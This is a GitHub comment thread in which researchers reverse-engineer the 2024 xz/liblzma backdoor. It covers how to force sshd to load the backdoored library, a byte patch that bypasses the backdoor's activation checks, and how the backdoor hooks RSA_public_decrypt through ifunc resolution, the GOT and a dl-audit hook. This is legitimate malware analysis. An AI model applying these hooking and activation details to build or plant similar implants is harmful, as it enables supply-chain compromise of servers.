Force sshd to use the modified library with LD_PRELOAD
env -i LC_LANG=C LD_PRELOAD=$PWD/liblzma.so.5.6.1 /usr/sbin/sshd -h

FWIW, I may have observed some minor behavioral differences between the normal initialization order and when liblzma.so.5.6.1 is loaded earlier due to LD_PRELOAD. Probably just noise, but it may be worth using LD_LIBRARY_PATH instead. That requires a symlink from liblzma.so.5 to the modified liblzma.so.5.6.1 in the directory with the modified liblzma, of course.

@tux3

tux3 commented Mar 31, 2024

To remove the env var and argv0 check, patch function 0x3A10 (in the 5.6.1.o) to always return 1

E.g. an EB F7 on top of xor eax, eax does the trick.

(Note I work directly on a liblzma.so instead of the crc64_fast object, so I'm not 100% sure on the function offsets, but it's the function that does cmp eax, 0x0108)

@sivizius

Could you somehow keep track of re-renamings of labels or state the offsets? 👉 👈

@badactress

.text.parse_optiona, at 00107050, and in fake function .Llzma12_mode_map.part1, before calling table_get in a while loop, it calls what I've named table_get_first_empty_index:

That's a name based on the context? Otherwise the behaviour looks like strlen().

long table_get_first_empty_index(char *key)

{
  long index;
  
  if (*key != '\0') {
    index = 0;
    do {
      index = index + 1;
    } while (key[index] != '\0');
    return index;
  }
  return 0;
}

@goabout2

goabout2 commented Apr 1, 2024

Should the dynamic analysis be done on Debian?

@smx-smx
Author

smx-smx commented Apr 1, 2024

Should the dynamic analysis be done on Debian?

Yes, everything was done on Debian Testing

@luvletter2333

luvletter2333 commented Apr 2, 2024

I posted my analysis at https://github.com/luvletter2333/xz-backdoor-analysis. It is currently limited to recovering structures and prototypes, and has not reached the hook part yet.

@fkirc

fkirc commented Apr 2, 2024

Thank you for your analysis.
I have a question regarding the write-execute memory protection:

I understand that xz was mapped into the address-space of sshd. However, I still don’t understand how it is possible to overwrite a function of sshd.
Until now, I thought that all modern Linux-systems are enforcing a write-xor-execute policy: https://en.m.wikipedia.org/wiki/W%5EX
This means that every page of memory could be writable or executable, but not both at the same time.

So how on earth it is possible that some malicious library is overwriting code of sshd?
I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

@PluMGMK

PluMGMK commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

@anarazel

anarazel commented Apr 2, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

@fkirc

fkirc commented Apr 3, 2024

So how on earth it is possible that some malicious library is overwriting code of sshd? I thought that every attempt to overwrite code of sshd should lead to an immediate segfault due to the write-xor-execute-policy of the operating system?

It doesn't overwrite code per se, just function pointers. The pointers themselves aren't executable code, they just provide the address of the executable code. As for why the function pointers aren't read-only, it's because this attack works at the ifunc-resolving stage, where glibc has got.plt mapped read-write so that it can replace the pointers to ifunc resolvers with the corresponding resolved function pointers (at least, if I've understood this correctly…).

It doesn't even overwrite them during the ifunc resolution itself - it can't, because when liblzma is loaded the main binary isn't yet mapped. And they wanted to redirect the main binary's use of RSA_public_decrypt, and the GOT for that is mapped alongside the main binary. That's why they install the dl-audit hook, it gets called later when the relocations in the main binary are being processed.

Can you elaborate more about what is a “dl-audit hook“ and how is it possible to overwrite function pointers in the GOT?
How does it even find the GOT of sshd if ASLR is enabled?
I thought that every library has its own GOT and doesn’t know where the GOTs of other libraries are located in the virtual memory?

@step21

step21 commented Apr 3, 2024

AFAIK pointers are not ‘overwritten’. This ifunc resolution is ordinarily used to select different functions, e.g. based on the architecture it is run on. So this is a glibc functionality and it doesn’t need to disable ASLR or similar.

@Xiphoseer